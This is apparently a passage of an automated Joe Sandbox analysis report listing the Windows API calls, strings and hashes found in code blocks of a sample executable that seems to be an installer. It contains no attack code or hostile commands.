                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                      • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                    • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: SHPathPrepareForWriteA$shell32.dll
                                                    • API String ID: 2238633743-2683653824
                                                    • Opcode ID: 25a4dc9541e494d4f478376088f4118d6a1224d0a714e6d5fca985b35bc39c4d
                                                    • Instruction ID: 48aea337371b5dbca44804c24081d1198016d0c57ab59c55e23a700f58ea278e
                                                    • Opcode Fuzzy Hash: 25a4dc9541e494d4f478376088f4118d6a1224d0a714e6d5fca985b35bc39c4d
                                                    • Instruction Fuzzy Hash: 89B092A0640705A8CD047BB21857B0F2A4494A0B18790423B301475083EF7C88205A5E
                                                    APIs
                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238), ref: 0047CFB0
                                                    • FindClose.KERNEL32(000000FF,0047CFDB,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238,00000000), ref: 0047CFCE
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileNext
                                                    • String ID:
                                                    • API String ID: 2066263336-0
                                                    • Opcode ID: 9f09813f7918e7f3537418bbdf228f62d8dd8a495373f8467bf1863306f2bb6d
                                                    • Instruction ID: d4706787225a87a8d466f388a3eb94f1c6a992d4ef98e923761ffbb9731f628b
                                                    • Opcode Fuzzy Hash: 9f09813f7918e7f3537418bbdf228f62d8dd8a495373f8467bf1863306f2bb6d
                                                    • Instruction Fuzzy Hash: 32814B70D0024DAFCF11DF95CC91ADFBBB9EF49308F5080AAE808A7291D6399A46CF55
                                                    APIs
                                                      • Part of subcall function 0042EE28: GetTickCount.KERNEL32 ref: 0042EE2E
                                                      • Part of subcall function 0042EC80: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECB5
                                                    • GetLastError.KERNEL32(00000000,00475509,?,?,0049C1D0,00000000), ref: 004753F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CountErrorFileLastMoveTick
                                                    • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                    • API String ID: 2406187244-2685451598
                                                    • Opcode ID: 7dd558b458d748696a875524af4e195e3f09e273ab8622730eb0a1e32a8ceb2d
                                                    • Instruction ID: 7c456f6db07972d04682c0112793eede51d985a58d5564732b5c120557be107c
                                                    • Opcode Fuzzy Hash: 7dd558b458d748696a875524af4e195e3f09e273ab8622730eb0a1e32a8ceb2d
                                                    • Instruction Fuzzy Hash: 5D419670A006099BCB10EFA5D882ADF77B5EF48314F608537E404BB355E7B89E458BAD
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00413D3E
                                                    • GetDesktopWindow.USER32 ref: 00413DF6
                                                      • Part of subcall function 00418EB8: 6F59C6F0.COMCTL32(?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418ED4
                                                      • Part of subcall function 00418EB8: ShowCursor.USER32(00000001,?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418EF1
                                                    • SetCursor.USER32(00000000,?,?,?,?,00413AEB,00000000,00413AFE), ref: 00413E34
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CursorDesktopWindow$Show
                                                    • String ID:
                                                    • API String ID: 2074268717-0
                                                    • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                    • Instruction ID: 9b0def8c9c64a2c96ee02a3ab3d0705208e3fbe4449c9c566199a376d490666d
                                                    • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                    • Instruction Fuzzy Hash: D2411931600210AFC710DF2AFA84B5677A5EB69329B16807BE405CB365DB38ED81CF9C
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A65
                                                    • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AD4
                                                    • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B6F
                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BAE
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: LoadString$FileMessageModuleName
                                                    • String ID:
                                                    • API String ID: 704749118-0
                                                    • Opcode ID: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                    • Instruction ID: 89cba0e7522a9b83fcc2071cfb28f1965358b02fab5b9b8693395207a1b0bde5
                                                    • Opcode Fuzzy Hash: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                    • Instruction Fuzzy Hash: A63110716083809AD330EB65CA45B9FB7D8AB85704F44483FB6C8E72D1DB7899048B6B
                                                    APIs
                                                    • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E905
                                                      • Part of subcall function 0044CF48: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF7A
                                                    • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E989
                                                      • Part of subcall function 0042BBAC: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC0
                                                    • IsRectEmpty.USER32(?), ref: 0044E94B
                                                    • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E96E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                    • String ID:
                                                    • API String ID: 855768636-0
                                                    • Opcode ID: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                    • Instruction ID: fae584cc962e85b422f7b584321c3529105593e75d7f1ff9ae22b75d4be52dd2
                                                    • Opcode Fuzzy Hash: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                    • Instruction Fuzzy Hash: F1116A71B4030067E610BA3A8C86B5B76C99B98748F15093FB505EB3C2DE7DDC0983A9
                                                    APIs
                                                    • OffsetRect.USER32(?,?,00000000), ref: 00494E94
                                                    • OffsetRect.USER32(?,00000000,?), ref: 00494EAF
                                                    • OffsetRect.USER32(?,?,00000000), ref: 00494EC9
                                                    • OffsetRect.USER32(?,00000000,?), ref: 00494EE4
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: OffsetRect
                                                    • String ID:
                                                    • API String ID: 177026234-0
                                                    • Opcode ID: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                    • Instruction ID: 1704218a4531d37ac2ab58ce54688b95f7f5c665c469e7ed4027bbe581d59bf2
                                                    • Opcode Fuzzy Hash: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                    • Instruction Fuzzy Hash: C42190BA704201AFCB00DE69CD85E6BB7DAEFC4340F148A3AF944C7249E638ED058755
                                                    APIs
                                                    • GetCursorPos.USER32 ref: 00417258
                                                    • SetCursor.USER32(00000000), ref: 0041729B
                                                    • GetLastActivePopup.USER32(?), ref: 004172C5
                                                    • GetForegroundWindow.USER32(?), ref: 004172CC
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                    • String ID:
                                                    • API String ID: 1959210111-0
                                                    • Opcode ID: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                    • Instruction ID: d8f212eab659ab8611038d963e52f28b2b0f2619fe8d71a0b25c9b868ff876e9
                                                    • Opcode Fuzzy Hash: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                    • Instruction Fuzzy Hash: B121B0303486008AC710AB69D944AEB33F1EF58724B1145BBF8459B392DB3DDC82CB8D
                                                    APIs
                                                    • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494AFD
                                                    • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494B11
                                                    • MulDiv.KERNEL32(F70A2BE8,00000008,?), ref: 00494B25
                                                    • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00494B43
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                    • Instruction ID: 4e21b8649f01b029d01931fbc34569bb41b57a17a8c4fb2cd57aac9c741bb68b
                                                    • Opcode Fuzzy Hash: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                    • Instruction Fuzzy Hash: 1F113072605104AFCF40DFA9C8C5E9B7BECEF8D320B1541AAF908DB246D634ED418B68
                                                    APIs
                                                    • GetClassInfoA.USER32(00400000,0041F468,?), ref: 0041F499
                                                    • UnregisterClassA.USER32(0041F468,00400000), ref: 0041F4C2
                                                    • RegisterClassA.USER32(00499598), ref: 0041F4CC
                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F507
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                    • String ID:
                                                    • API String ID: 4025006896-0
                                                    • Opcode ID: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
                                                    • Instruction ID: e4d668e9dca91fd32e585eae6d60143d6dfbdf42e70c096e3b85bfad9ab1786c
                                                    • Opcode Fuzzy Hash: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
                                                    • Instruction Fuzzy Hash: 63016D722001046BDB10EBACED81E9B3798A729314B10423FBA15E73A2D7399D458BAC
                                                    APIs
                                                    • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D20F
                                                    • LoadResource.KERNEL32(00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C,0000000A,00000000), ref: 0040D229
                                                    • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C), ref: 0040D243
                                                    • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?), ref: 0040D24D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
                                                    • Instruction ID: 3283e33870439dafd25d8e1e147512606e62b5bf6a0133693b61d2317928fdf1
                                                    • Opcode Fuzzy Hash: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
                                                    • Instruction Fuzzy Hash: C5F04FB26056047F8B04EE99A881D5B77DDDE88264314027EF908EB242DA38DD018B69
                                                    APIs
                                                    • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021F7B18,000012C4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                    • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021F7B18,000012C4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021F7B18,000012C4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                    • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021F7B18,000012C4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                    • String ID:
                                                    • API String ID: 730355536-0
                                                    • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                    • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                    • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                    • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                    APIs
                                                    • GetLastError.KERNEL32(?,00000000), ref: 00470411
                                                    Strings
                                                    • Setting NTFS compression on file: %s, xrefs: 004703DF
                                                    • Unsetting NTFS compression on file: %s, xrefs: 004703F7
                                                    • Failed to set NTFS compression state (%d)., xrefs: 00470422
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                    • API String ID: 1452528299-3038984924
                                                    • Opcode ID: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
                                                    • Instruction ID: 0d596443d05caf7374ea98a63d842d8765eee9d82fb477a7c18f0f713548320e
                                                    • Opcode Fuzzy Hash: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
                                                    • Instruction Fuzzy Hash: 3601A730E0924896CB14D7AD94412EDBBB48F09304F54C1EFB85CE7382DB780A098B9A
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00000000), ref: 0046FC65
                                                    Strings
                                                    • Unsetting NTFS compression on directory: %s, xrefs: 0046FC4B
                                                    • Failed to set NTFS compression state (%d)., xrefs: 0046FC76
                                                    • Setting NTFS compression on directory: %s, xrefs: 0046FC33
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                    • API String ID: 1452528299-1392080489
                                                    • Opcode ID: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
                                                    • Instruction ID: 1ff60dd8eb5a114f2a7af6b3d642365226de0c959c43d8a3966afd89414ec8a0
                                                    • Opcode Fuzzy Hash: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
                                                    • Instruction Fuzzy Hash: 5B011730E0824C56CB04D7ADA4412DDBBB4AF4D314F54C5BFA899D7382EA790A0D879B
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000,0045B5F5), ref: 00455DAC
                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000), ref: 00455DB5
                                                    • RemoveFontResourceA.GDI32(00000000), ref: 00455DC2
                                                    • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DD6
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                    • String ID:
                                                    • API String ID: 4283692357-0
                                                    • Opcode ID: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
                                                    • Instruction ID: 990a694f9916720730b0810028faebd1b23d30e86244cf38efb64550af4b0806
                                                    • Opcode Fuzzy Hash: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
                                                    • Instruction Fuzzy Hash: 7CF090B274070036EA10B6B65C46F2B12DC8F54745F10883AB500EF2C3D57CDC044629
